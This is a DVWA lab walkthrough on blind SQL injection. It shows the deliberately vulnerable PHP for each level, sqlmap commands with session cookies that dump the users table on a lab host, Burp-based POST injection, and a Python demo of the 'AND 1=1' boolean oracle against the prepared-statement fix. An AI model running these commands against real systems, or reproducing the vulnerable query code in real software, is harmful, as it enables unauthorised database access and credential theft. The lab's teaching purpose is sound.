DVWA lab - SQL Injection (Blind)

Previous posts in this series:

DVWA lab - Brute Force

DVWA lab - Command Injection

DVWA lab - CSRF (cross-site request forgery)

DVWA lab - File Inclusion

DVWA lab - File Upload

DVWA lab - SQL Injection

Setting up the lab environment

https://github.com/ethicalhack3r/DVWA

[Network security study notes]: Building the DVWA lab

Table of contents

SQL Injection (Blind)

Low SQL Injection (Blind)

Core code

Medium SQL Injection (Blind)

Core code

High SQL Injection (Blind)

Core code

Impossible SQL Injection (Blind)

Core code


SQL Injection (Blind)

Low SQL Injection (Blind)

Core code

<?php

if( isset( $_GET[ 'Submit' ] ) ) {
    // Get the id value
    $id = $_GET[ 'id' ];

    // Query the database
    $getid  = "SELECT first_name, last_name FROM users WHERE user_id = '$id';";
    $result = mysqli_query($GLOBALS["___mysqli_ston"],  $getid );

    // Get the result
    $num = @mysqli_num_rows( $result );
    if( $num > 0 ) {
        echo '<pre>User ID exists in the database.</pre>';
    }
    else {
        header( $_SERVER[ 'SERVER_PROTOCOL' ] . ' 404 Not Found' );
        echo '<pre>User ID is MISSING from the database.</pre>';
    }

    ((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
}

?>

Since manual blind SQL injection is very time-consuming, sqlmap is used for the injection here.

List the current database name

sqlmap -u "http://192.168.1.200/DVWA-master/vulnerabilities/sqli_blind/?id=1&Submit=Submit#" --cookie "security=low; PHPSESSID=5c5k95olhvmj2q6k3d6fuu1995" --current-db

List the table names

sqlmap -u "http://192.168.1.200/DVWA-master/vulnerabilities/sqli_blind/?id=1&Submit=Submit#" --cookie "security=low; PHPSESSID=5c5k95olhvmj2q6k3d6fuu1995" -D dvwa1 --tables

Dump the data in the users table

sqlmap -u "http://192.168.1.200/DVWA-master/vulnerabilities/sqli_blind/?id=1&Submit=Submit#" --cookie "security=low; PHPSESSID=5c5k95olhvmj2q6k3d6fuu1995" -D dvwa1 -T users --dump --batch

 

Medium SQL Injection (Blind)

Core code

<?php

if( isset( $_POST[ 'Submit' ]  ) ) {
    // Get input
    $id = $_POST[ 'id' ];
    $id = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $id ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));

    // Check database
    $getid  = "SELECT first_name, last_name FROM users WHERE user_id = $id;";
    $result = mysqli_query($GLOBALS["___mysqli_ston"],  $getid ); // Removed 'or die' to suppress mysql errors

    // Get results
    $num = @mysqli_num_rows( $result ); // The '@' character suppresses errors
    if( $num > 0 ) {
        // Feedback for end user
        echo '<pre>User ID exists in the database.</pre>';
    }
    else {
        // Feedback for end user
        echo '<pre>User ID is MISSING from the database.</pre>';
    }

    //mysql_close();
}

?>

The submission method has changed from GET to POST, and the id is now passed through mysqli_real_escape_string, but it is still inserted into the query unquoted.

Use Burp Suite to capture the POST request and save it to a file named post.r

vim post.r

sqlmap -r post.r -D dvwa1 -T users --dump --batch

 

High SQL Injection (Blind)

Core code

<?php

if( isset( $_COOKIE[ 'id' ] ) ) {
    // Get input
    $id = $_COOKIE[ 'id' ];

    // Check database
    $getid  = "SELECT first_name, last_name FROM users WHERE user_id = '$id' LIMIT 1;";
    $result = mysqli_query($GLOBALS["___mysqli_ston"],  $getid ); // Removed 'or die' to suppress mysql errors

    // Get results
    $num = @mysqli_num_rows( $result ); // The '@' character suppresses errors
    if( $num > 0 ) {
        // Feedback for end user
        echo '<pre>User ID exists in the database.</pre>';
    }
    else {
        // Might sleep a random amount
        if( rand( 0, 5 ) == 3 ) {
            sleep( rand( 2, 4 ) );
        }

        // User wasn't found, so the page wasn't!
        header( $_SERVER[ 'SERVER_PROTOCOL' ] . ' 404 Not Found' );

        // Feedback for end user
        echo '<pre>User ID is MISSING from the database.</pre>';
    }

    ((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
}

?>

Compared with the previous two levels, the id value is now passed in a cookie, and a random sleep is added on the not-found path, which makes blind injection (especially time-based) slower and noisier.

Get the current database name

sqlmap -u "http://192.168.1.200/DVWA-master/vulnerabilities/sqli_blind/" --cookie="id=1*; security=high; PHPSESSID=5c5k95olhvmj2q6k3d6fuu1995" --dbms=MySQL --technique=B --random-agent --flush-session -v 3 --current-db

As for the user names and passwords, I won't repeat them here because it is too time-consuming.

 

Impossible SQL Injection (Blind)

Core code

<?php

if( isset( $_GET[ 'Submit' ] ) ) {
    // Check Anti-CSRF token
    checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );

    // Get input
    $id = $_GET[ 'id' ];

    // Was a number entered?
    if(is_numeric( $id )) {
        // Check the database
        $data = $db->prepare( 'SELECT first_name, last_name FROM users WHERE user_id = (:id) LIMIT 1;' );
        $data->bindParam( ':id', $id, PDO::PARAM_INT );
        $data->execute();

        // Get results
        if( $data->rowCount() == 1 ) {
            // Feedback for end user
            echo '<pre>User ID exists in the database.</pre>';
        }
        else {
            // User wasn't found, so the page wasn't!
            header( $_SERVER[ 'SERVER_PROTOCOL' ] . ' 404 Not Found' );

            // Feedback for end user
            echo '<pre>User ID is MISSING from the database.</pre>';
        }
    }
}

// Generate Anti-CSRF token
generateSessionToken();

?>

The Impossible level uses an is_numeric check together with a PDO prepared statement to defend against SQL injection, and adds an anti-CSRF token check to further improve security.
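To make the difference between the Medium and Impossible levels concrete, here is an added example (not DVWA's own code) that reimplements both lookups in Python over an in-memory sqlite3 table standing in for MySQL: the escape() helper approximates mysqli_real_escape_string, the users rows are constructed sample data, and the integer check is a simplified is_numeric. It shows why escaping an unquoted numeric value leaves a true/false oracle, and why the prepared statement with input validation removes it.

```python
import sqlite3

# Constructed stand-in for DVWA's users table (sample rows, not DVWA's real data).
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (user_id INTEGER, first_name TEXT, last_name TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?, ?)",
                   [(1, "admin", "admin"), (2, "Gordon", "Brown")])
    return db

def escape(s):
    # Approximation of mysqli_real_escape_string: backslash-escapes quotes and backslashes.
    return s.replace("\\", "\\\\").replace("'", "\\'").replace('"', '\\"')

def medium_exists(db, user_input):
    # Medium level: the input is escaped, but interpolated into an UNQUOTED numeric
    # context, so input without quote characters passes through unchanged.
    query = f"SELECT first_name, last_name FROM users WHERE user_id = {escape(user_input)};"
    try:
        return len(db.execute(query).fetchall()) > 0
    except sqlite3.Error:
        return False  # DVWA suppresses errors with '@', so the user just sees MISSING

def impossible_exists(db, user_input):
    # Impossible level: reject anything that is not an integer (simplified is_numeric),
    # then bind the value as a parameter so it can never become SQL syntax.
    if not user_input.strip().lstrip("-").isdigit():
        return False
    row = db.execute("SELECT first_name, last_name FROM users WHERE user_id = ? LIMIT 1",
                     (int(user_input),)).fetchone()
    return row is not None

def oracle_leaks(lookup, db, base_id="2"):
    # A boolean-based blind oracle exists when an always-true and an always-false
    # condition appended to a valid id yield different exists/missing answers.
    return lookup(db, f"{base_id} AND 1=1") != lookup(db, f"{base_id} AND 1=2")

if __name__ == "__main__":
    db = make_db()
    print("Medium leaks a true/false oracle:", oracle_leaks(medium_exists, db))          # True
    print("Impossible leaks a true/false oracle:", oracle_leaks(impossible_exists, db))  # False
```

The same unquoted-context mistake is what the Low and High levels avoid only by accident (they quote $id), which is why escaping alone is never the fix; validate the type and bind the parameter.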


Source: blog.csdn.net/weixin_43252204/article/details/106597457